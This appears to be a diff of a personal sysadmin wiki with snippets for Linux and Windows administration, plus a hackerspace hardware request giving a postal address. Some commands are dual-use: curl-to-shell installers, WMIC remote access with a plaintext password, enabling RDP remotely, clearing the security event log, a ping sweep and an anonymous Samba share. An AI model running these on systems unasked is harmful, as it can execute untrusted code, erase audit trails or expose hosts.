+# Make sure only 1 instance runs
+if [ -e "$LCK_FLE" ] ; then
+	OTHER_PID=`/bin/cat $LCK_FLE`
+	echo "Another instance already running: $OTHER_PID"
+	exit 1
+fi
+echo $$ > "$LCK_FLE"
+
+for REPO in $REPOS ; do
+	echo "Syncing $REPO"
+	/usr/bin/rsync $RSYNC_OPTS ${SOURCE}/${REPO} ${DEST}
+done
+
+# Cleanup
+/bin/rm -f "$LCK_FLE"
+
+exit 0
+}}}
+

!Request for a pandaboard
+Felix Richter
+Burgunderstr. 39
+70435 Stuttgart
+Germany
+
+Hi, this is Felix Richter from Germany. I am a member of the german Hackerspace Shackspace (www.shackspace.de) and here we are working on a large number of Open Source and simply cool projects. For example two cool members hacked an electronic lock in order to make physical keys obsolete and provide a way to open the lock with your very own ssh private key (http://shackspace.de/wiki/doku.php?id=project:white_box) and we even have our own arduino implementation Shackuino ( http://shackspace.de/wiki/doku.php?id=project:shackuino). Currently we are forced out of our current rooms and have to find a new one until February 28. Every day new projects come to the mind of the members and it would be great if we could get support for our cause.
+
+In addition to that we have another project called genericore ( http://shackspace.de/wiki/doku.php?id=project:genericore) which uses a message queueing system in order to collect data from different sources, process these data (e.g. generate statistics from the data) and then send them to different outputs (like html,xmpp,irc and so on). The pandaboard could provide a module which sends the collected data from the wireless sensor network to this message queue. In addition to that, it can provide other modules which only work at our location (e.g. check how many clients are currently connected to our network via asking our snmp enabled router how many clients are in the arp table and then arp-scan all clients for better results https://github.com/shackspace/genericore-snmp_users)
+
+The pandaboard is just like the greatest thing we could ever hope for our projects, it is just incredible flexible, has all(and more) extensions we could possibly need and uses nearly no energy, which is great to keep it on 24/7 in our location without the fear of a too high energy bill. This of course is great for our statistics generation and information gathering approach because we would love to have continuous data from all the sensors and modules.
+We were looking for a long time for such a platform. It even enables more projects here at our hackerspace to fold out because the pandaboard has enough power (2core cpu) to work in many different projects at the same time!

! quick tweaks
+do it dirty, write in {{{/etc/rc.local}}}
+{{{
+echo deadline > /sys/block/sda/queue/scheduler #deadline io scheduler
+echo ondemand >/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor #ondemand scheduler
+}}}
+
+also see [[swapdisk]]

Quick ping-scan
+{{{
+1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("192.168.137.$_", 10) } | where-object { $_.Status -eq "Success" } | select $_.Address.Address
+}}}

!prepare
+{{{
+pacman -S qemu
+ln -s /usr/bin/qemu-system-x86_64 /usr/bin/qemu
+}}}
+!the whole thingy
+{{{
+qemu-img create -f qcow2 boot.img 10G
+qemu \
+  -enable-kvm \ # use it
+  -m 512 \ # available memory
+  -hda boot.img \
+  -cdrom isos/archlinux-2013.02.01-dual.iso \
+  -boot d \  # boot iso
+  -vnc :1  \ # vncviewer :1
+  -net nic,macaddr=00:00:00:00:00:00 -net user \ # user mode network (dhcp, ping does not work)
+  -redir tcp:2222::22 # IP-forwarding which arrive at host port 2222 to client port 22
+}}}
+! create qemu snapshot
+{{{
+qemu-img create -f qcow2 -b rhel.img rhel-snap.img
+qemu .... -hda rhel-snap.img
+#using rhel.img will corrupt the snapshot
+}}}

detach programs, for example from interactive session into screen session
+
+! Troubleshooting
+{{{
+echo 0 > /proc/sys/kernel/yama/ptrace_scope
+}}}

! Tips
+{{{
+# get all packages with given format (here csv)
+rpm -qa --qf '"%{NAME}","%{VERSION}\n"'
+}}}

!caveeats
+#warnings about "lchown" in logs:
+
+{{{perl -MCPAN -e 'install qw(Lchown)'}}}

! install rvm
+{{{
+curl -L https://get.rvm.io | bash -s stable
+}}}
+! usage
+{{{
+# try`rvm autolibs enable`
+rvm autolibs enable
+# rvm requirements 1.9.3 | sed  's/,//g' 
+rvm install 1.9.3
+rvm use --default 1.9.3
+}}}

! Anonymous Samba Share
+!! Create Samba Config
+in {{{/etc/samba/smb.conf}}}
+{{{
+[global]
+        # this disables all the authentication with 'guest ok'
+	#security = SHARE
+[temp]
+	comment = Shared
+	path = /home/samba
+	force user = sambaman
+	force group = users
+	read only = No
+	guest ok = Yes
+}}}
+!! Create Samba User
+{{{
+useradd -c "Sambaman" -m -g users -p "moar samba browsing fuck yeah" sambaman
+}}}
+!! Restart 
+{{{
+systemctl restart smbd
+}}}

{{{
+altscreen on
+term screen-256color
+
+hardstatus alwayslastline
+hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{= kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{B} %m-%d %{W}%c %{g}]'
+}}}

! Resources
+http://wiki.centos.org/HowTos/SELinux
+http://www.centos.org/docs/5/html/5.2/Deployment_Guide/sec-sel-use-audit2allow.html
+! Commands
+{{{
+sestatus
+setenforce -- toggle between enforcing and permissive
+/etc/selinux/config -- 
+ls -Z
+ps axZ
+id -Z -- show security context
+chcon -v --type=httpd_sys_content_t /html -- change the context of the file
+semanage fcontext -a -t httpd_sys_content_t "/html(/.*)?"  -- make context permanent between reboots
+restorecon -v /var/www/html/index.html  -- restore the security context of a file (after cp)
+restorecon -Rv -n /var/www/html  -- check if security context changes happened
+touch /.autorelabel -- trigger complete relabeling of file system
+grep smtpd_t /var/log/audit/audit.log | audit2allow -M postgreylocal -- create policy file from audit logfile
+semodule -i postgreylocal.pp  -- load the new module
+semodule -l -- check if module is loaded
+}}}
+

! gnu alternatives
+!! readlink -f
+{{{
+canonicalpath() {
+  if [ -d $1 ]; then
+    pushd $1 > /dev/null 2>&1
+    echo $PWD
+  elif [ -f $1 ]; then
+    pushd $(dirname $1) > /dev/null 2>&1
+    echo $PWD/$(basename $1)
+  else
+    echo "Invalid path $1"
+  fi
+  popd > /dev/null 2>&1
+}
+}}}
+{{{
+canonicalize(){
+  cd -P -- "$(dirname -- "$1")" &&
+  printf '%s\n' "$(pwd -P)/$(basename -- "$1")"
+}
+}}}
+!! mount -o bind
+{{{
+mount -F lofs DIR1 DIR2
+}}}

! .ssh/config
+{{{
+Host $hostname
+    User $username
+    Port $port
+    HostName $ipOrHostname
+    IdenitityFile $pathToFile
+}}}
+! remote commands
+{{{
+ssh user@host 'path-to-remote-command'
+}}}
+!! Proxy Through SSH
+{{{
+ProxyCommand ssh external.example.net %h:22
+}}}
+!! Chrooting
+
+{{{
+#?/bin/sh
+groupadd sftp
+useradd -d /opt/u -m -N -g sftp u
+mkdir /opt/u/.ssh
+echo "PUBKEY" > /opt/u/.ssh/authorized_keys
+mkdir /opt/u/editable
+chown u:sftp -R /opt/u/
+chown root:sftp /opt/u/
+chmod 750 -R /opt/u/
+cat >>/etc/ssh/sshd_config <<EOF
+
+Subsystem sftp /usr/lib/openssh/sftp-server
+
+Match User u
+    AllowTCPForwarding no
+    X11Forwarding no
+    PasswordAuthentication no
+
+Match Group sftp
+    ChrootDirectory %h
+    ForceCommand internal-sftp
+EOF
+}}}
+
+
+

!create swap from file
+{{{
+truncate --size 8G /swapfile
+mkswap /swapfile
+swapon /swapon
+}}}
+!! /etc/fstab
+{{{
+echo "/swapfile     none swap defaults 0 0" >> /etc/fstab
+}}}
+!minimize swappiness
+{{{
+echo 0 > /proc/sys/vm/swappiness
+}}}
+
+!! after reboot
+in {{{/etc/sysctl.conf}}}
+{{{
+vm.swappiness=1 
+}}}

! run shit in tmux
+in {{{/etc/systemd/system/start-shit.service}}}
+{{{
+[Unit]
+Description=start shit
+
+[Service]
+Type=oneshot
+RemainAfterExit=yes
+KillMode=none
+User=root
+ExecStart=/usr/bin/tmux new-session -s %u -d '<my cool script>'
+ExecStop=/usr/bin/tmux kill-session -t %u
+
+[Install]
+WantedBy=multi-user.target
+}}}
+! call rc.local
+in {{{/etc/systemd/system/rc-local.service}}}
+{{{
+[Unit]
+Description=/etc/rc.local Compatibility
+ConditionPathExists=/etc/rc.local
+
+[Service]
+Type=oneshot
+ExecStart=/etc/rc.local start
+StandardOutput=tty
+RemainAfterExit=yes
+SysVStartPriority=99
+
+[Install]
+WantedBy=multi-user.target
+}}}

Tinc is your virtual private network.
+!logging
+Get infos from current network
+see also github->makefu->retiolum
+{{{
+sudo tincd -n retiolum --kill=USR2 --user=tincd --chroot
+}}}
+run with
+{{{
+tincd --user=tincd --chroot -n retiolum
+}}}
+
+!installation
+Use this installation with great caution!
+{{{
+curl tinc.krebsco.de | HOSTN=krebsbobkhan sh
+}}}
+! v6-only host routing to v4 via tinc
+!! server (pigstarter)
+{{{
+#?/bin/sh
+# forwarding
+echo "net.ipv6.conf.conf.all.forwarding=1">> /etc/sysctl.conf
+sysctl net.ipv6.conf.conf.all.forwarding=1
+# ufw
+sed -i 's/\(DEFAULT_FORWARD_POLICY=\).*/\1"ACCEPT"/' /etc/default/ufw
+service ufw restart
+# tinc config
+echo "Subnet = 0.0.0.0/0" >> /etc/tinc/retiolum/hosts/pigstarter 
+}}}
+!! client (irkel)
+{{{
+cat >>/etc/tinc/retiolum/tinc-up <<EOF
+ip addr add 10.243.0.153 dev \$INTERFACE
+ip addr add default dev \$INTERFACE
+EOF
+}}}
+
+! Building on amazon ec2 aws instance
+{{{
+#!/bin/sh
+set -e
+sudo yum install -y gcc openssl-devel 
+mkdir build
+cd build
+curl http://www.oberhumer.com/opensource/lzo/download/lzo-2.04.tar.gz | tar xz
+cd lzo-2.04
+./configure --prefix=/usr
+make
+sudo make install
+cd ..
+curl http://www.tinc-vpn.org/packages/tinc-1.0.13.tar.gz | tar xz
+cd tinc-1.0.13
+./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var
+make
+sudo make install
+}}}

create sessions on startup
+{{{
+tmux start-server
+tmux new-session -d -s daemons -n daemons 
+tmux new-window -t daemons:1
+tmux new-window -t daemons:2
+tmux new-window -t daemons:3
+tmux new-window -t daemons:4
+
+tmux send-keys -t daemons:0 'dropboxd' C-m
+tmux send-keys -t daemons:1 'offlineimap' C-m
+tmux send-keys -t daemons:2 '/usr/bin/python2 /opt/sabnzbd/SABnzbd.py -f /home/makefu/.sabnzbd.ini/sabnzbd.ini -d' C-m
+tmux send-keys -t daemons:3 'DISPLAY=:0.0 redshift -l 9.16:48.8' C-m
+tmux send-keys -t daemons:4 'DISPLAY=:0.0 twinkle' C-m
+}}}
+or
+{{{
+tmux new-session "$CMD"
+}}}
+!Splitting
+{{{C-B :split-window -h}}} splits the window to have left and right 
+{{{C-B ARROW}}} move to next split

! Create ISO
+{{{
+mkisofs -o /tmp/cd.iso /tmp/directory
+}}}
+! install u3-tool with libusb
+until very recently u3-tool does not seem to support sg-submodule (or something i do not really know).
+Try building u3-tool for libusb
+{{{
+wget http://downloads.sourceforge.net/project/u3-tool/u3-tool/0.3/u3-tool-0.3.tar.gz
+tar xf this_file
+cd u3-tool-0.3
+./configure --with-libusb  --prefix=/usr LIBS=-lusb
+make install
+}}}
+! burn image
+{{{
+modprobe -r usb-storage
+u3-tool -p500000000 /dev/sdx
+u3-tool -i file.iso /dev/sdx
+}}}

! Fresh install
+!! Install MTA
+see [[msmtp]]
+!! Unattended Upgrades
+{{{
+aptitude install unattended-upgrades
+}}}
+!!! automagic
+{{{
+sudo dpkg-reconfigure -plow unattended-upgrades
+}}}
+!!! manual
+in {{{/etc/apt/apt.conf.d/50unattended-upgrades}}} append
+{{{
+Unattended-Upgrade::Mail "me@domain.com";
+Unattended-Upgrade::MailOnlyOnError "true";
+Unattended-Upgrade::Remove-Unused-Dependencies "true";
+}}}
+in {{{/etc/apt/apt.conf.d/20auto-upgrades}}}
+{{{
+APT::Periodic::Update-Package-Lists "1";
+APT::Periodic::Unattended-Upgrade "1";
+APT::Periodic::Download-Upgradeable-Packages "1";
+APT::Periodic::AutocleanInterval "7";
+}}}
+also see {{{/etc/cron.daily/apt}}}

! syntax
+{{{
+# allow port on interface
+ufw allow in on retiolum from any port 46299
+# allow ipv6 address
+ufw allow from 42:0b2c:d90e:e717:03dc:9ac1:7c30:a4db to any
+}}}

! update a link
+{{{
+update-alternatives --config ruby
+}}}
+query
+{{{
+update-alternatives --query rub
+}}}

! miranda
+{{{
+wget ``miranda from here somewhere: https://code.google.com/p/mirandaupnptool/ ``
+python2 miranda.py
+  msearch
+  host get 0
+  host info 0
+  host summary 0
+  help
+}}}

a better Terminal Emulator:
+in {{{~/.Xdefaults}}}
+{{{
+URxvt*matcher.button:   1
+URxvt*perl-ext:         default,matcher
+URxvt.urlLauncher: chromium
+URxvt*matcher.pattern.1:\\bwww\\.[\\w-]+\\.[\\w./?&@#-]*[\\w/-]
+}}}

! openwrt
+packages: {{{usbip usbip-server kmod-usbip-server}}}
+! usage
+!! Server
+{{{
+usbipd -D
+usbip list -l
+  ...
+usbip bind <<USB-BUSID>>
+}}}
+!! Client
+{{{
+usbip list -r <<SERVER>
+usbip attach -h <<SERVER>> -b <<USB-BUSID>>
+}}}

!Inception Hosting
+!! Debian 6
+{{{
+#mknod /dev/xvda b 202 0
+
+sed -i 's/sda/xvda/' /boot/grub/device.map:
+
+#Edit /usr/sbin/update-grub
+#Replace:
+#find_device ()
+#{
+#if ! test -e ${device_map} ; then
+#echo quit | grub --batch --no-floppy --device-map=${device_map} > /dev/null
+#fi
+#grub-probe --device-map=${device_map} -t device $1 2> /dev/null
+#}
+##With:
+#
+#find_device ()
+#{
+#if ! test -e ${device_map} ; then
+#echo quit | grub --batch --no-floppy --device-map=${device_map} > /dev/null
+#fi
+##grub-probe --device-map=${device_map} -t device $1 2> /dev/null
+#
+#echo /dev/xvda
+#}
+update-grub 0
+sed -i "s/xvda/xvda1/g" /boot/grub/menu.lst
+}}}
+
+! Iptables
+{{{
+apt-get install iptables-persistent
+cat <<EOF > /etc/iptables/rules
+# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
+*nat
+:PREROUTING ACCEPT [1:60]
+:POSTROUTING ACCEPT [0:0]
+:OUTPUT ACCEPT [0:0]
+#-A PREROUTING -i venet0:0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 22 
+COMMIT
+# Completed on Wed May 16 17:39:35 2012
+# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
+*mangle
+:PREROUTING ACCEPT [4608:600641]
+:INPUT ACCEPT [4608:600641]
+:FORWARD ACCEPT [0:0]
+:OUTPUT ACCEPT [4662:571608]
+:POSTROUTING ACCEPT [4662:571608]
+COMMIT
+# Completed on Wed May 16 17:39:35 2012
+# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
+*filter
+:INPUT DROP [27:19186]
+:FORWARD DROP [0:0]
+:OUTPUT ACCEPT [4662:571608]
+-A INPUT -i lo -j ACCEPT 
+-A INPUT -i retiolum -j ACCEPT 
+-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT 
+-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT 
+-A INPUT -p tcp -m tcp --dport 655 -j ACCEPT 
+-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT 
+-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT 
+-A INPUT -p tcp -m tcp --dport 9111 -j ACCEPT 
+COMMIT
+# Completed on Wed May 16 17:39:35 2012
+EOF
+}}}
+

! .vimrc
+
+! Plugins
+
+! Tipps
+!! Goto file and back
+{{{ gf }}} to go into file and {{{CTRL-O}}} to go back again
+!! open words manpage
+{{{
+K
+}}}
+!! copy char from row above
+CTRL + y
+!! Shell Colors
+{{{Ctrl-V ESC}}} for escaping {{{^[}}}
+write :
+{{{<ESC>[{attr};{fg};{bg}m}}}
+{{{
+{attr} is one of following
+	0	Reset All Attributes (return to normal mode)
+	1	Bright (Usually turns on BOLD)
+	2 	Dim
+	3	Underline
+	5	Blink
+	7 	Reverse
+	8	Hidden
+{fg} is one of the following
+	30	Black
+	31	Red
+	32	Green
+	33	Yellow
+	34	Blue
+	35	Magenta
+	36	Cyan
+	37	White
+{bg} is one of the following
+	40	Black
+	41	Red
+	42	Green
+	43	Yellow
+	44	Blue
+	45	Magenta
+	46	Cyan
+	47	White
+}}}
+
+

! /etc/vncserver oder /etc/sysconfig/vncserver
+{{{
+VNCSERVERS="2:username"
+VNCSERVERARGS[2]=" -nolisten tcp -nohttpd "
+}}}
+! $HOME/.vnc/xstartup
+{{{
+unset SESSION_MANAGER
+exec /etc/X11/xinit/xinitrc
+}}}

! init
+{{{
+vnstat -u -i venet0
+vnstat -u -i retiolum
+}}}

! compiling
+!! fresh
+{{{
+./configure --prefix=/usr --sysconfdir=/etc 
+make install
+}}}
+!! UTF-8 is broken after compilation
+{{{
+# you might have missed these two lines when doing ./configure:
+## *** ncursesw library not found! Falling back to "ncurses"
+## *** Be careful, UTF-8 display may not work properly if your locale is UTF-8.                                                                                              
+#install ncursesw header 
+apt-get install libncursesw-dev
+}}}
+! search
+you will need 0.4.2 or higher. see {{{http://weechat.org/files/doc/devel/weechat_user.en.html#key_bindings_search_context}}}.
+{{{
+/key resetall -yes search
+/save
+# search in nick names,etc
+ctrl-r and TAB...
+}}}
+!! grep
+{{{
+/script install grep.py
+/grep ball
+/help grep
+}}}

! Processes
+see also http://isc.sans.edu/diary.html?storyid=2376
+{{{
+wmic /?
+wmic process where (name="cmd.exe" or name="calc.exe") list brief 
+wmic process where (executablepath like "%system32%") list brief
+wmic process list brief
+wmic process where name="cmd.exe" delete #kill process
+wmic process where name="cmd.exe" call terminate #
+wmic process call create cmd.exe
+}}}
+! Users
+{{{
+wmic useraccount
+}}}
+! Network
+{{{
+wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.0.0.0")
+wmic nicconfig where Index=1 call EnableDHCP
+netsh /? # alternative to wmic
+}}}
+!! Remote access
+{{{
+wmic /user:"lab\Administrator" /password:"letmein" /node:@"pclist.txt" useraccount list full #or /node:"192.168.1.1"
+}}}
+!! Remote Desktop
+{{{
+wmic /node:"servername" RDtoggle where servername="servername" get AllowTSConnections #check for remote desktop
+wmic /node:"servername" RDToggle" where servername="servername" call SetAllowTSConnections 1
+wmic /node:servername path Win32_terminaleServiceSetting where AllowTSConnections=0 call SetAllowTSConnections 1
+}}}
+! Logging
+{{{
+wmic nteventlog list brief
+wmic nteventlog where "Logfilename = 'System'" Call BackupEventLog "eventlog.evt"
+wmic nteventlog where "logfilename = 'security'" call cleareventlog
+
+}}}
+! misc
+{{{
+wmic qfe #quick fix engineering
+wmic startup list full #show all the files loaded
+wmic /output:os.html os get /format:hform # get os intel in html format
+}}}

! Basics
+{{{
+#!/usr/bin/python2
+import wx
+class MainFrame(wx.Frame):
+    def __init__(self,parent,title):
+        wx.Frame.__init__(self,parent,title=title,size=(200,100))
+        self.control = wx.TextCtrl(self,style=wx.TE_MULTILINE)
+        self.CreateStatusBar()
+
+        filemenu = wx.Menu()
+
+        menuAbout = filemenu.Append(wx.ID_ABOUT,"&About","About this program")
+
+        menuExit = filemenu.Append(wx.ID_EXIT,"E&xit","Terminate")
+
+        menuBar = wx.MenuBar()
+        menuBar.Append(filemenu,"&File")
+        self.SetMenuBar(menuBar)
+
+        self.Bind(wx.EVT_MENU,self.OnAbout,menuAbout)
+        self.Bind(wx.EVT_MENU,self.OnExit,menuExit)
+        self.Show(True)
+    def OnAbout(self,e):
+        dlg = wx.MessageDialog(self,"Small Text editor", "about Sample",
+                wx.OK)
+        dlg.ShowModal()
+        dlg.Destroy()
+    def OnExit(self,e):
+        self.Close(True)
+
+app = wx.App(False)
+frame = MainFrame(None,"Hello World")
+app.MainLoop()
+}}}

! run script
+RunScript(script.xxx) or RunAddon(addon.xxx) 
+{{{
+xbmc-send -a 'RunScript(script.games.rom.collection.browser)'
+xbmc-send -a "Notification(Hey,Hey there this is a message)"
+}}}

chromium will use xdg-open to open files.
+When perl-file-mimeinfo is installed, xdg-open will use mimeopen.
+
+{{{
+mimeopen -d
+}}}
+will let you choose which tool to use for opening the file
+
+!config path
+it can also be configured either in
+{{{/usr/share/applications/defaults.list }}}
+or
+{{{~/.local/share/applications/defaults.list}}}
+

debug and test x11 input (find the current keysyms, keycodes, everythin)
+great to remap buttons with [[xmodmap]]

! Disable Standby
+in xorg.conf
+{{{
+Section "ServerFlags"
+Option "BlankTime" "0"
+Option "StandbyTime" "0"
+Option "SuspendTime" "0"
+Option "OffTime" "0"
+EndSection
+}}}

! Installation
+!! Ubuntu
+{{{
+echo "deb http://winswitch.org/ precise main" | sudo tee /etc/apt/sources.list.d/winswitch.list
+curl http://winswitch.org/gpg.asc | sudo apt-key add -
+sudo aptitude update
+sudo aptitude install winswitch
+}}}

also see [[rpm]]
+!Create local Repository
+choose from os/updates and x86_64/i386 and version 5/5.1/5.2 ...
+{{{
+rsync -avrt ftp-stud.fht-esslingen.de::centos/5/os/x86_64 5/os/
+}}}
+! Repository from DVD
+http://wiki.centos.org/HowTos/CreateLocalRepos
+1. Copy all files from the DVD
+{{{
+mount /dev/cdrom /mnt
+cp -rv /mnt/CentOS /mnt/repodata /var/www/html/centos/5/os/x86_64/
+umount /mnt
+}}}
+2. create a local.repo file and save it into the /etc/yum.repos.d directory:
+{{{
+[local]
+name=CentOS-$releasever – local packages for $basearch
+baseurl=file:///path/to/centos/$releasever/local/$basearch
+enabled=1
+gpgcheck=0
+protect=1
+}}}
+3. use createrepo script for custom rpms (non-cd non-default)
+{{{
+createrepo /var/www/html/centos/5/local/x86_64
+}}}

in {{{~/.zshrc}}}
+{{{
+ # bindkey -v # vi mode
+bindkey -e # emacs mode
+<C-A>      - Beginning of line
+<C-E>      - End of line 
+}}}
+!coloring
+{{{
+autoload colors; colors
+export PS1="%{$fg[green]%}[%{$reset_color%}%n@%m %~%{$fg[green]%}]%{$reset_color%}$ " # colorizes the brackets
+}}}
+! Change default shell
+{{{
+chsh -s /bin/zsh
+}}}
+! Oh my zsh
+more at {{{https://github.com/robbyrussell/oh-my-zsh}}}
+{{{
+git clone git://github.com/robbyrussell/oh-my-zsh.git ~/.oh-my-zsh
+cp ~/.zshrc ~/.zshrc.orig # will need to rewrite it anyway
+cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc
+}}}
+in new .zshrc
+{{{
+export ZSH=$HOME/.oh-my-zsh
+export ZSH_THEME="gallifrey" #or fishy
+plugins=(git ssh-agent)
+# and all the other stuff
+test -r ~/Dropbox/shared_shell && source ~/Dropbox/shared_shell
+}}}
+!! uninstall ohmyzsh
+{{{
+uninstall_oh_my_zsh
+}}}
+! Bookmarks
+{{{
+# From https://gist.github.com/835905
+# Original code for bash from:
+# http://www.huyng.com/archives/quick-bash-tip-directory-bookmarks/492/
+
+# Zsh Directory Bookmarks
+alias m1='alias g1="cd `pwd`"'
+alias m2='alias g2="cd `pwd`"'
+alias m3='alias g3="cd `pwd`"'
+alias m4='alias g4="cd `pwd`"'
+alias m5='alias g5="cd `pwd`"'
+alias m6='alias g6="cd `pwd`"'
+alias m7='alias g7="cd `pwd`"'
+alias m8='alias g8="cd `pwd`"'
+alias m9='alias g9="cd `pwd`"'
+alias mdump='alias -L|grep -e "alias g[0-9]"|grep -v "alias m" > ~/.bookmarks'
+alias lma='alias -L|grep -e "alias g[0-9]"|grep -v "alias m"|sed "s/alias //"'
+touch ~/.bookmarks
+source ~/.bookmarks
+}}}
+
+